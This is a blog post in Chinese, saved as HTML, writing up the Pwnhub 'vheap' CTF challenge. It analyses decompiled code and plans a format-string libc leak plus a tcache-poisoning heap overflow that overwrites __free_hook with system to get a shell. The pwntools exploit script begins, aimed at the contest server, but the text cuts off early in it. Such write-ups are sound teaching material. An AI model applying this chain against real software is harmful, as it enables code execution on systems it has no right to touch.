

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/0.ico">
  <link rel="icon" href="/img/0.ico">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="sh0ve1">
  <meta name="keywords" content="">
  
    <meta name="description" content="入场券+1~~">
<meta property="og:type" content="article">
<meta property="og:title" content="Pwnhub-5月公开赛-vheap">
<meta property="og:url" content="https://sh0ve1.github.io/2022/05/16/Pwnhub-5%E6%9C%88%E5%85%AC%E5%BC%80%E8%B5%9B-vheap/index.html">
<meta property="og:site_name" content="sh0ve1&#39;s blog">
<meta property="og:description" content="入场券+1~~">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://sh0ve1.github.io/img/12.jpg">
<meta property="article:published_time" content="2022-05-16T05:04:59.000Z">
<meta property="article:modified_time" content="2022-05-19T12:11:42.483Z">
<meta property="article:author" content="sh0ve1">
<meta property="article:tag" content="heap">
<meta property="article:tag" content="fmtstr">
<meta property="article:tag" content="堆溢出">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://sh0ve1.github.io/img/12.jpg">
  
  
  <title>Pwnhub-5月公开赛-vheap - sh0ve1&#39;s blog</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4/github-markdown.min.css" />
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/hint.css@2/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.css" />
  


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"sh0ve1.github.io","root":"/","version":"1.8.14","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":"pU0JQUaRtEv6Lgu0jxYpEBT9-gzGzoHsz","app_key":"2Gdcl19Uu0nQBNMs6fu6YiR4","server_url":"https://pu0jquar.lc-cn-n1-shared.com","path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 6.1.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>sh0ve1&#39;s blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/post_1.jpg') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="Pwnhub-5月公开赛-vheap">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2022-05-16 13:04" pubdate>
        2022年5月16日 下午
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      6.4k 字
    </span>
  

  
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      54 分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">Pwnhub-5月公开赛-vheap</h1>
            
            <div class="markdown-body">
              <h2 id="0x0-前言"><a href="#0x0-前言" class="headerlink" title="0x0 前言"></a>0x0 前言</h2><p>逆向分析好难~~</p>
<h2 id="0x1-基本信息"><a href="#0x1-基本信息" class="headerlink" title="0x1 基本信息"></a>0x1 基本信息</h2><ul>
<li>libc-2.27.so (2.27-3ubuntu1.5_amd64)</li>
<li>file vheap : 64bit 动态链接 剥除符号表<br><code>vheap: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=cbaf01a931b82c301cc6818963c21ff18c51b0ea, stripped</code></li>
<li>checksec vheap ： 保护全开<figure class="highlight avrasm"><table><tr><td class="gutter"><div class="code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></div></td><td class="code"><pre><code class="hljs avrasm"><span class="hljs-symbol">Arch:</span>     amd64<span class="hljs-number">-64</span>-little<br><span class="hljs-symbol">RELRO:</span>    Full RELRO<br><span class="hljs-symbol">Stack:</span>    Canary found<br><span class="hljs-symbol">NX:</span>       NX enabled<br><span class="hljs-symbol">PIE:</span>      PIE enabled<br></code></pre></td></tr></table></figure></li>
</ul>
<h2 id="0x2-程序分析"><a href="#0x2-程序分析" class="headerlink" title="0x2 程序分析"></a>0x2 程序分析</h2><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br></pre></td><td class="code"><pre><code class="hljs awk">__int64 __fastcall main(__int64 a1, char **a2, char **a3)<br>&#123;<br>  int v3; <span class="hljs-regexp">//</span> eax<br>  int v5; <span class="hljs-regexp">//</span> [rsp+<span class="hljs-number">0</span>h] [rbp-<span class="hljs-number">70</span>h] BYREF<br>  int i; <span class="hljs-regexp">//</span> [rsp+<span class="hljs-number">4</span>h] [rbp-<span class="hljs-number">6</span>Ch]<br>  int pieces; <span class="hljs-regexp">//</span> [rsp+<span class="hljs-number">8</span>h] [rbp-<span class="hljs-number">68</span>h]<br>  int size; <span class="hljs-regexp">//</span> [rsp+Ch] [rbp-<span class="hljs-number">64</span>h]<br>  char s[<span class="hljs-number">16</span>]; <span class="hljs-regexp">//</span> [rsp+<span class="hljs-number">10</span>h] [rbp-<span class="hljs-number">60</span>h] BYREF<br>  __int64 v10; <span class="hljs-regexp">//</span> [rsp+<span class="hljs-number">20</span>h] [rbp-<span class="hljs-number">50</span>h]<br>  __int64 v11; <span class="hljs-regexp">//</span> [rsp+<span class="hljs-number">28</span>h] [rbp-<span class="hljs-number">48</span>h]<br>  __int64 v12; <span class="hljs-regexp">//</span> [rsp+<span class="hljs-number">30</span>h] [rbp-<span class="hljs-number">40</span>h]<br>  __int64 v13; <span class="hljs-regexp">//</span> [rsp+<span class="hljs-number">38</span>h] [rbp-<span class="hljs-number">38</span>h]<br>  __int64 v14; <span class="hljs-regexp">//</span> [rsp+<span class="hljs-number">40</span>h] [rbp-<span class="hljs-number">30</span>h]<br>  __int64 v15; <span class="hljs-regexp">//</span> [rsp+<span class="hljs-number">48</span>h] [rbp-<span class="hljs-number">28</span>h]<br>  __int64 v16; <span class="hljs-regexp">//</span> [rsp+<span class="hljs-number">50</span>h] [rbp-<span class="hljs-number">20</span>h]<br>  __int64 v17; <span class="hljs-regexp">//</span> [rsp+<span class="hljs-number">58</span>h] [rbp-<span class="hljs-number">18</span>h]<br>  unsigned __int64 v18; <span class="hljs-regexp">//</span> [rsp+<span class="hljs-number">68</span>h] [rbp-<span class="hljs-number">8</span>h]<br><br>  v18 = __readfsqword(<span class="hljs-number">0</span>x28u);<br>  v5 = <span class="hljs-number">0</span>;<br>  i = <span class="hljs-number">0</span>;<br>  size = <span class="hljs-number">0</span>;<br>  strcpy(s, <span class="hljs-string">&quot;welcome:&quot;</span>);<br>  v10 = <span class="hljs-number">0</span>LL;<br>  v11 = <span class="hljs-number">0</span>LL;<br>  v12 = <span class="hljs-number">0</span>LL;<br>  v13 = <span class="hljs-number">0</span>LL;<br>  v14 = <span class="hljs-number">0</span>LL;<br>  v15 = <span class="hljs-number">0</span>LL;<br>  v16 = <span class="hljs-number">0</span>LL;<br>  v17 = <span class="hljs-number">0</span>LL;<br>  init_IO();<br>  puts(<span class="hljs-string">&quot;welcome to my vheap_001.&quot;</span>);<br>  puts(<span class="hljs-string">&quot;first,tell me your name.&quot;</span>);<br>  read(<span class="hljs-number">0</span>, format, <span class="hljs-number">8</span>uLL);<br>  sprintf(&amp;s[<span class="hljs-number">8</span>], format);                       <span class="hljs-regexp">//</span> 格式化字符串漏洞<br>  puts(s);                                      <span class="hljs-regexp">//</span> \x00截断<br>  puts(<span class="hljs-string">&quot;next,tell something?&quot;</span>);<br>  puts(<span class="hljs-string">&quot;How many pieces of data?&quot;</span>);<br>  pieces = get_long();<br>  <span class="hljs-keyword">if</span> ( pieces &lt; <span class="hljs-number">0</span> || pieces &gt; <span class="hljs-number">2</span> )               <span class="hljs-regexp">//</span> <span class="hljs-number">0</span> <span class="hljs-number">1</span> <span class="hljs-number">2</span><br>  &#123;<br>    puts(<span class="hljs-string">&quot;don&#x27;t do it&quot;</span>);<br>    <span class="hljs-keyword">exit</span>(<span class="hljs-number">0</span>);<br>  &#125;<br>  <span class="hljs-keyword">for</span> ( i = <span class="hljs-number">0</span>; i &lt; pieces; ++i )                <span class="hljs-regexp">//</span> 分批次写入数据，每次<span class="hljs-number">0</span>x40 最多<span class="hljs-number">2</span>个<br>    read(<span class="hljs-number">0</span>, (char *)&amp;data + <span class="hljs-number">0</span>x40 * (__int64)i, <span class="hljs-number">0</span>x40uLL);<br>  puts(<span class="hljs-string">&quot;Size:&quot;</span>);<br>  size = get_long();<br>  printf(<span class="hljs-string">&quot;%d\n&quot;</span>, (unsigned int)size);<br>  <span class="hljs-keyword">if</span> ( size &gt; <span class="hljs-number">9</span> )                               <span class="hljs-regexp">//</span> 最多<span class="hljs-number">9</span>次<br>  &#123;<br>    puts(<span class="hljs-string">&quot;too long&quot;</span>);<br>    <span class="hljs-keyword">exit</span>(<span class="hljs-number">0</span>);<br>  &#125;<br>  puts(<span class="hljs-string">&quot;???&quot;</span>);<br>  puts(<span class="hljs-string">&quot;[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++]&quot;</span>);<br>  <span class="hljs-keyword">for</span> ( i = <span class="hljs-number">0</span>; i &lt; size; ++i )                  <span class="hljs-regexp">//</span> 依次写入指令 初始化数组<br>  &#123;<br>    __isoc99_scanf(<span class="hljs-string">&quot;%d&quot;</span>, &amp;v5);                  <span class="hljs-regexp">//</span> 每个指令都是四字节 int<br>    Array1[i] = v5;<br>  &#125;<br>  init_Array2();                                <span class="hljs-regexp">//</span> Array2 不用管<br>  <span class="hljs-keyword">for</span> ( i = <span class="hljs-number">0</span>; i &lt; size; ++i )<br>  &#123;<br>    v3 = get_Array1_v1();                       <span class="hljs-regexp">//</span> 从idx=<span class="hljs-number">0</span>开始依次读取Array1中存储的指令<br>    mainFunc(v3);                               <span class="hljs-regexp">//</span> 解析指令，并处理<br>  &#125;<br>  return <span class="hljs-number">0</span>LL;<br>&#125;<br></code></pre></td></tr></table></figure>
<ol>
<li>程序在一开始就存在一个格式化字符串漏洞，可用于泄露数据；</li>
<li>然后输入要写入的数据片段的个数，最多只能由有2个，然后再根据个数输入0x40的数据片段，这些数据片段只能写入一次，因此需要提前构造好数据；</li>
<li>然后输入Size，确定要执行的指令个数，最多只能有9个；</li>
<li>再根据指令个数，依次输入指令，将其存储到Array1数组中。每一个指令都是int型整数，结构如下：</li>
</ol>
<p><img src="https://note.youdao.com/yws/res/17814/WEBRESOURCEc39a453393c98833bfd0e81ddb756547" srcset="/img/loading.gif" lazyload alt="指令结构"></p>
<ol start="5">
<li>从idx&#x3D;0开始读取指令，然后传参给mainFunc函数解析并执行指令。由于是依次处理指令，因此指令输入顺序需要构造好。</li>
</ol>
<figure class="highlight reasonml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br></pre></td><td class="code"><pre><code class="hljs reasonml">unsigned __int64 __fastcall main<span class="hljs-constructor">Func(<span class="hljs-params">int</span> <span class="hljs-params">num</span>)</span><br>&#123;<br>  unsigned __int64 v2; <span class="hljs-comment">// [rsp+28h] [rbp-18h]</span><br><br>  v2 = <span class="hljs-constructor">__readfsqword(0x28u)</span>;<br>  <span class="hljs-keyword">if</span> ( (num &amp; <span class="hljs-number">0x80</span>u) != <span class="hljs-number">0</span><span class="hljs-operator"> || </span>(<span class="hljs-built_in">char</span>)num &gt; <span class="hljs-number">2</span><span class="hljs-operator"> || </span>(num &amp; <span class="hljs-number">0x800000</span>) != <span class="hljs-number">0</span><span class="hljs-operator"> || </span><span class="hljs-constructor">SBYTE2(<span class="hljs-params">num</span>)</span> &gt; <span class="hljs-number">2</span> )<br>  &#123;<br>    <span class="hljs-keyword">while</span> ( <span class="hljs-number">1</span> )<br>    &#123;<br>      puts(<span class="hljs-string">&quot;[+]error code!!!!&quot;</span>);<br>      puts(<span class="hljs-string">&quot;[+]warning!!!!!!!&quot;</span>);<br>    &#125;<br>  &#125;<br>  <span class="hljs-keyword">if</span> ( <span class="hljs-constructor">HIBYTE(<span class="hljs-params">num</span>)</span> &gt; <span class="hljs-number">0x70</span>u )<br>  &#123;<br>    <span class="hljs-keyword">if</span> ( <span class="hljs-constructor">HIBYTE(<span class="hljs-params">num</span>)</span><span class="hljs-operator"> == </span><span class="hljs-number">0xB0</span> )<br>    &#123;<br>      Array2<span class="hljs-literal">[SBYTE2(<span class="hljs-identifier">num</span>)]</span> = Array2<span class="hljs-literal">[SBYTE1(<span class="hljs-identifier">num</span>)]</span> ^ Array2<span class="hljs-literal">[(<span class="hljs-identifier">char</span>)<span class="hljs-identifier">num</span>]</span>;<br>      return <span class="hljs-constructor">__readfsqword(0x28u)</span> ^ v2;<br>    &#125;<br>    <span class="hljs-keyword">if</span> ( <span class="hljs-constructor">HIBYTE(<span class="hljs-params">num</span>)</span> &gt; <span class="hljs-number">0xB0</span>u )<br>    &#123;<br>      <span class="hljs-keyword">if</span> ( <span class="hljs-constructor">HIBYTE(<span class="hljs-params">num</span>)</span><span class="hljs-operator"> == </span><span class="hljs-number">0xD0</span> )<br>      &#123;<br>        Array2<span class="hljs-literal">[SBYTE2(<span class="hljs-identifier">num</span>)]</span> = (__int64)Array2<span class="hljs-literal">[SBYTE1(<span class="hljs-identifier">num</span>)]</span> &gt;&gt; Array2<span class="hljs-literal">[(<span class="hljs-identifier">char</span>)<span class="hljs-identifier">num</span>]</span>;<br>        return <span class="hljs-constructor">__readfsqword(0x28u)</span> ^ v2;<br>      &#125;<br>      <span class="hljs-keyword">if</span> ( <span class="hljs-constructor">HIBYTE(<span class="hljs-params">num</span>)</span><span class="hljs-operator"> == </span><span class="hljs-number">0xC0</span> )<br>        Array2<span class="hljs-literal">[SBYTE2(<span class="hljs-identifier">num</span>)]</span> = Array2<span class="hljs-literal">[SBYTE1(<span class="hljs-identifier">num</span>)]</span> &lt;&lt; Array2<span class="hljs-literal">[(<span class="hljs-identifier">char</span>)<span class="hljs-identifier">num</span>]</span>;<br>    &#125;<br>  &#125;<br>  <span class="hljs-keyword">if</span> ( <span class="hljs-constructor">HIBYTE(<span class="hljs-params">num</span>)</span><span class="hljs-operator"> == </span><span class="hljs-number">0xA</span> )                     <span class="hljs-comment">// 申请</span><br>    *((_QWORD *)&amp;heaparray + (<span class="hljs-built_in">char</span>)num) = malloc(<span class="hljs-constructor">SBYTE1(<span class="hljs-params">num</span>)</span>);<span class="hljs-comment">// malloc</span><br>  <span class="hljs-keyword">if</span> ( <span class="hljs-constructor">HIBYTE(<span class="hljs-params">num</span>)</span> &gt; <span class="hljs-number">0x72</span>u )<br>  &#123;<br>    <span class="hljs-keyword">if</span> ( <span class="hljs-constructor">HIBYTE(<span class="hljs-params">num</span>)</span><span class="hljs-operator"> == </span><span class="hljs-number">0xB1</span> )<br>    &#123;<br>      Array2<span class="hljs-literal">[SBYTE2(<span class="hljs-identifier">num</span>)]</span> = Array2<span class="hljs-literal">[(<span class="hljs-identifier">char</span>)<span class="hljs-identifier">num</span>]</span><span class="hljs-operator"> * </span>Array2<span class="hljs-literal">[SBYTE1(<span class="hljs-identifier">num</span>)]</span>;<br>      return <span class="hljs-constructor">__readfsqword(0x28u)</span> ^ v2;<br>    &#125;<br>    <span class="hljs-keyword">if</span> ( <span class="hljs-constructor">HIBYTE(<span class="hljs-params">num</span>)</span> &gt; <span class="hljs-number">0xB2</span>u )<br>    &#123;<br>      <span class="hljs-keyword">if</span> ( <span class="hljs-constructor">HIBYTE(<span class="hljs-params">num</span>)</span><span class="hljs-operator"> == </span><span class="hljs-number">0xD2</span> )<br>      &#123;<br>        Array2<span class="hljs-literal">[SBYTE2(<span class="hljs-identifier">num</span>)]</span> = Array2<span class="hljs-literal">[SBYTE1(<span class="hljs-identifier">num</span>)]</span> - Array2<span class="hljs-literal">[(<span class="hljs-identifier">char</span>)<span class="hljs-identifier">num</span>]</span>;<br>        return <span class="hljs-constructor">__readfsqword(0x28u)</span> ^ v2;<br>      &#125;<br>      <span class="hljs-keyword">if</span> ( <span class="hljs-constructor">HIBYTE(<span class="hljs-params">num</span>)</span><span class="hljs-operator"> == </span><span class="hljs-number">0xC3</span> )<br>        Array2<span class="hljs-literal">[SBYTE2(<span class="hljs-identifier">num</span>)]</span> = Array2<span class="hljs-literal">[(<span class="hljs-identifier">char</span>)<span class="hljs-identifier">num</span>]</span> + Array2<span class="hljs-literal">[SBYTE1(<span class="hljs-identifier">num</span>)]</span>;<br>    &#125;<br>  &#125;<br>  <span class="hljs-keyword">if</span> ( <span class="hljs-constructor">HIBYTE(<span class="hljs-params">num</span>)</span><span class="hljs-operator"> == </span><span class="hljs-number">0xB</span> )<br>    memcpy(*((void **)&amp;heaparray + (<span class="hljs-built_in">char</span>)num), (<span class="hljs-built_in">char</span> *)&amp;data + <span class="hljs-number">0x40</span><span class="hljs-operator"> * </span>(__int64)<span class="hljs-constructor">SBYTE2(<span class="hljs-params">num</span>)</span>, <span class="hljs-number">0x40</span>uLL);<span class="hljs-comment">// edit vul?</span><br>  <span class="hljs-keyword">if</span> ( <span class="hljs-constructor">HIBYTE(<span class="hljs-params">num</span>)</span> &gt; <span class="hljs-number">0x7D</span>u )<br>  &#123;<br>    <span class="hljs-keyword">if</span> ( <span class="hljs-constructor">HIBYTE(<span class="hljs-params">num</span>)</span><span class="hljs-operator"> == </span><span class="hljs-number">0xBC</span> )<br>    &#123;<br>      Array2<span class="hljs-literal">[SBYTE2(<span class="hljs-identifier">num</span>)]</span> = Array2<span class="hljs-literal">[SBYTE1(<span class="hljs-identifier">num</span>)]</span> ^ Array2<span class="hljs-literal">[(<span class="hljs-identifier">char</span>)<span class="hljs-identifier">num</span>]</span>;<br>      return <span class="hljs-constructor">__readfsqword(0x28u)</span> ^ v2;<br>    &#125;<br>    <span class="hljs-keyword">if</span> ( <span class="hljs-constructor">HIBYTE(<span class="hljs-params">num</span>)</span> &gt; <span class="hljs-number">0xBA</span>u<span class="hljs-operator"> &amp;&amp; </span><span class="hljs-constructor">HIBYTE(<span class="hljs-params">num</span>)</span><span class="hljs-operator"> == </span><span class="hljs-number">0xC9</span> )<br>      Array2<span class="hljs-literal">[SBYTE2(<span class="hljs-identifier">num</span>)]</span> = Array2<span class="hljs-literal">[(<span class="hljs-identifier">char</span>)<span class="hljs-identifier">num</span>]</span> + Array2<span class="hljs-literal">[SBYTE1(<span class="hljs-identifier">num</span>)]</span>;<br>  &#125;<br>  <span class="hljs-keyword">if</span> ( <span class="hljs-constructor">HIBYTE(<span class="hljs-params">num</span>)</span><span class="hljs-operator"> == </span><span class="hljs-number">0xC</span> )<br>  &#123;<br>    free(*((void **)&amp;heaparray + (<span class="hljs-built_in">char</span>)num));  <span class="hljs-comment">// free</span><br>    *((_QWORD *)&amp;heaparray + (<span class="hljs-built_in">char</span>)num) = <span class="hljs-number">0L</span>L;<br>  &#125;<br>  return <span class="hljs-constructor">__readfsqword(0x28u)</span> ^ v2;<br>&#125;<br></code></pre></td></tr></table></figure>
<ol>
<li>首先检查指令是否合法；</li>
<li>然后根据指令的最高字节执行相应的功能</li>
</ol>
<figure class="highlight ada"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs ada"><span class="hljs-number">0</span>xA : <span class="hljs-type">malloc</span><br><span class="hljs-number">0</span>xB : <span class="hljs-type">edit</span><br><span class="hljs-number">0</span>xC : <span class="hljs-type">free</span><br></code></pre></td></tr></table></figure>
<blockquote>
<p>其中edit功能由memcpy实现，把指定的0x40大小的数据片段复制到自定义大小（可以小于0x40）的堆中，因此存在堆溢出漏洞</p>
</blockquote>
<h2 id="0x3-利用思路"><a href="#0x3-利用思路" class="headerlink" title="0x3 利用思路"></a>0x3 利用思路</h2><ol>
<li>首先利用格式化字符串漏洞泄露处libc基址；</li>
<li>然后申请两个堆块，其中第一个堆块必须要小于0x28,确保可以覆盖第二个堆块的fd；</li>
<li>释放第二个堆块，使其进入tcache中，然后使用第一个数据片段堆溢出第一个堆块，修改第二个堆块的fd为<code>__free_hook</code>;</li>
<li>连续申请两次获取<code>__free_hook</code>的写入权限，利用第二个数据片段修改其为<code>system</code>;</li>
<li>释放第一个堆块（提前将其fd布置为<code>/bin/sh\x00</code>）触发<code>system(&quot;/bin/sh&quot;)</code>获取shell。</li>
</ol>
<h2 id="0x4-Exp"><a href="#0x4-Exp" class="headerlink" title="0x4 Exp"></a>0x4 Exp</h2><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-comment">#!/usr/bin/env python3</span><br><span class="hljs-comment"># -*- encoding: utf-8 -*-</span><br><br><span class="hljs-comment"># flag&#123;freedom-love-freedom-for-life&#125;</span><br><br><span class="hljs-attribute">from</span> pwn import *<br><br><span class="hljs-attribute">context</span>.log_level = &#x27;debug&#x27;<br><span class="hljs-attribute">context</span>.arch = &#x27;amd64&#x27;<br><span class="hljs-attribute">context</span>.os = &#x27;linux&#x27;<br><br><span class="hljs-attribute">REMOTE</span> = <span class="hljs-number">1</span><br><span class="hljs-attribute">if</span> REMOTE:<br>    <span class="hljs-attribute">p</span> = remote(&#x27;<span class="hljs-number">121.40.89.206</span>&#x27;,<span class="hljs-number">33468</span>)<br>    <span class="hljs-attribute">libc</span> = ELF(&#x27;/home/sh0ve1/glibc-<span class="hljs-literal">all</span>-in-one/libs/<span class="hljs-number">2</span>.<span class="hljs-number">27</span>-<span class="hljs-number">3</span>ubuntu1.<span class="hljs-number">5</span>_amd64/libc-<span class="hljs-number">2</span>.<span class="hljs-number">27</span>.so&#x27;)<br><span class="hljs-attribute">else</span>:<br>    <span 